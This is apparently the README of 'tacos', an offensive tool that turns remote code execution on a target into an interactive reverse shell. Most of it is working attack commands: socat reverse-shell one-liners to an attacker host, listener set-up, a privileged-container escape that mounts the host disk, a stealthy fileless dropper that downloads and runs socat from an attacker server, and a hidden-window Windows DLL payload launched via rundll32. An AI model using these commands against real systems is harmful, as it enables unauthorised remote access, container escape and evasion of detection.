(reverse socat)
Spawn a pty in your reverse shell to automaticaly make it interactive for socat listener.
Fast interactive reverse shell set-up 🐳 (container)
All credit goes to laluka idea
Equivalent of:
socat exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP:PORT],verify=0Why ?
- transform RCE to interactive reverse shell with almost no prerequisite (only
curl) - cross-platform (windows support is OK but not yet interactive. It is recommended to use non-docker solution for it)
- tired of hitting ^C and loosing your shell?
- too lazy to copy/paste/learn socat command
- target doesn't have
socatand you don't want to do this - provide more advanced configuration to the tty (alias, etc)
- easier to obfuscate
tacos is built to work with the simple and dramatically effective project pty4all:
# On attacker machine
tmux
./light-pty4all/socat-listener.sh --lhost [ATTACKER_IP] --lport [ATTACKER_PORT] #multi-handler
# On target (transfer tacos as you wish)
./tacos [ATTACKER_IP]:[ATTACKER_PORT] # or .\tacos.exe [ATTACKER_IP]:[ATTACKER_PORT] for windows
# 💥Source aliases (for simplicity):
alias tacos.container='docker run --net host --rm -it ariary/tacos'Launch multi-handler listener:
tacos.container [LISTENING_ADDR] [LISTENING_PORT] # [OPTIONAL_TACOS_ARS]Notes about tacos container security:
From a networking point of view, this is the same level of isolation as if the processes were running directly on the host and not in a container. However, in all other ways, such as storage, process namespace, and user namespace, the process is isolated from the host.
Useful if target is running docker, kubernetes, etc ...
On attacker machine, launch your
tacos listener as usual
On target:
docker run --privileged --rm -it ariary/tacos-reverse [TACOS_LISTENER_IP]:[TACOS_LISTENER_PORT]
💡:--privilegedmode is not mandatory. It is used to allow container escaping with:fdisk -l mkdir /mnt/hostfs mount /dev/sda1 /mnt/hostfs
💡: If you only have writing access to a manifest deploying containers. Use ariary/tacos-reverse image with appropriate arguments
docker pull ariary/tacoscurl -lO -L -s https://github.com/ariary/tacos/releases/latest/download/tacos && chmod +x tacosneed go:
git clone https://github.com/ariary/tacos.git && cd tacos
make before.build
make build.tacos # or make build.tacos.windowsAlternatively, if target does not have socat:
Host a static version of socat binary and download + execute it using the stealthy filess-xec dropper:
# On attacker machine
# get socat static & expose it
static-get socat
python3 -m http.server 8080
# On target machine
# Use already downloaded fileless-xec to download socat and stealthy launch it with argument
fileless-xec [ATTACKER_IP]:8080/socat -- exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP]:443,verify=0# On attacker machine:
# modify ./cmd/tacosdll/tacosdll.go with the according IP:PORT
$ GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -buildmode=c-shared -ldflags="-w -s -H=windowsgui" -o tacos.dll ./cmd/tacosdll/tacosdll.go
# On remote:
> rundll32.exe ./tacos.dll,Tacos